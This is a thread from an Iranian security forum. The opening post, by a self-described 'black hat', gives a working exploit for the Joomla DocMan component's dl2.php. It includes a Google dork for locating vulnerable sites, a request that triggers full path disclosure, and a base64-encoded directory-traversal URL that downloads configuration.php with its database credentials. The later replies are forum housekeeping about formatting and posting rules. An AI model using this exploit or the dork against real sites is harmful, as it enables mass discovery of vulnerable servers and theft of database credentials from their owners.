انجمن تیم امنیتی ایران سایبر

Joomla Docman Component 'com_docman' Full Path Disclosure(fpd) & Local File Disclosure/include(lfd/

شروع موضوع توسط saeidkhan ‏20/6/18 در انجمن Remote Exploits

  1. لطفا فایل های خود را جهت ماندگاری در انجمن اپلود کنید در صورت مشاهده لینک اپلود خروجی , تاپیک حذف خواهد شد .
    بستن اطلاعیه
بستن اطلاعیه


درود مهمان گرامي؛

مهمان گرامي، براي مشاهده تالار با امکانات کامل ميبايست از طريق ايــن ليـــنک ثبت نام کنيد .

حامی مسابقات و برگزار کننده دوره های پیشرفته ارزیابی امنیت برای سازمان ها فتح پرچم (CTF)
  1. RedNofoZi
    عضو انجمن

    وضعیت:
    Offline
    تاریخ عضویت:
    ‏20/6/18
    ارسال ها:
    130
    تشکر شده:
    552
    شغل:
    blAck h3t
    محل سکونت:
    win 32
    Name:
    saeid
    Main os:
    Kali
    PHP:
    # Joomla docman Component 'com_docman' Full Path Disclosure(FPD) & Local File Disclosure/Include(LFD/LFI)
    # CWE: CWE-200(FPD) CWE-98(LFI/LFD)
    # Risk: High
    # Author: Rednofozi
    # Contact: [email protected]
    # Date: 04-08-2015
    # Vendor Homepage: http://extensions.joomla.org/extension/directory-a-documentation/downloads/docman
    # Google Dork: inurl:"/components/com_docman/dl2.php"
     
    # Xploit (FPD):
     
     
    Get one target and just download with blank parameter:
     
    http://www.site.com/components/com_docman/dl2.php?archive=0&file=
     
     
    In title will occur Full Path Disclosure of server.
     
    # Xploit (LFD/LFI):
     
     
    http://www.site.com/components/com_docman/dl2.php?archive=0&file=[LDF]
     
     
    Let's Xploit...
     
     First we need use Xploit FPD to see the path of target, after that we'
    ll Insert 'configuration.php' configuration database file and encode in Base64:
     
     ../../../../../../../
    target/www/configuration.php <= Not Ready
     
     http
    ://www.site.com/components/com_docman/dl2.php?archive=0&file=Li4vLi4vLi4vLi4vLi4vLi4vLi4vdGFyZ2V0L3d3dy9jb25maWd1cmF0aW9uLnBocA==  <= Ready !
     
     
    And Now we have a configuration file...

    .........................................................................................

    In the name of Allah
    Others have also sacrificed a life of insignificance Ali Khamenei
    Live Sistan
    All my life my homeland
    my homeland,
     
    آخرین بار توسط مدیر ویرایش شد: ‏20/6/18
    blackops، Mkali07 و xfud از این ارسال تشکر کرده اند.
  2. JOK3R

    وضعیت:
    Offline
    تاریخ عضویت:
    ‏22/10/14
    ارسال ها:
    446
    تشکر شده:
    2,104
    جنسیت:
    محل سکونت:
    dreams
    Name:
    james
    Main os:
    Windows
    کاربر عزیز لطفا پست های طولانی را درون تگ php یا html درج کنید
     
    blackops و xfud از این پست تشکر کرده اند.
  3. RedNofoZi
    عضو انجمن

    وضعیت:
    Offline
    تاریخ عضویت:
    ‏20/6/18
    ارسال ها:
    130
    تشکر شده:
    552
    شغل:
    blAck h3t
    محل سکونت:
    win 32
    Name:
    saeid
    Main os:
    Kali
    شرمنده چشم
    برای نمایش این قسمت باید وارد سیستم شوید یا اینکه ثبت نام نمایید
     
    xfud از این پست تشکر کرده است.
  4. JOK3R

    وضعیت:
    Offline
    تاریخ عضویت:
    ‏22/10/14
    ارسال ها:
    446
    تشکر شده:
    2,104
    جنسیت:
    محل سکونت:
    dreams
    Name:
    james
    Main os:
    Windows
    با تشکر از شما لطفا آدرس اکسپلویت ثبت شده رو هم قرار بدید
     
    Mkali07 و xfud از این پست تشکر کرده اند.
  5. Mkali07
    مدیریت انجمن

    وضعیت:
    Offline
    تاریخ عضویت:
    ‏9/6/16
    ارسال ها:
    103
    تشکر شده:
    545
    محل سکونت:
    /etc
    Name:
    root
    Main os:
    Kali

    با تشکر از پست خوبتون لطفا از اکسپلویت های شخصی در انجمن خود داری کنید اکسپلویت هایی در انجمن قرار میگیرد که به نام Iran Cyber Security Group ثبت شده باشد

    با تشکر
     
    JOK3R از این پست تشکر کرده است.
  6. RedNofoZi
    عضو انجمن

    وضعیت:
    Offline
    تاریخ عضویت:
    ‏20/6/18
    ارسال ها:
    130
    تشکر شده:
    552
    شغل:
    blAck h3t
    محل سکونت:
    win 32
    Name:
    saeid
    Main os:
    Kali
    خودم اسم خودم نوشته بودم اکسپلوت زیاد می نویسم دیگه چشم برای من ادمین یکی از تیم های امنیتی بودم یک چند ماه پییش بستمش دیگه میخوام اینجا فعالیت کنم با قوانین اشنا بشم
     
بارگذاری...
به انجمن تخصصی امنیت ایران سایبر خوش آمدید . برای مشاهده تمامی تالار ها و امکانات ثبت نام کنید .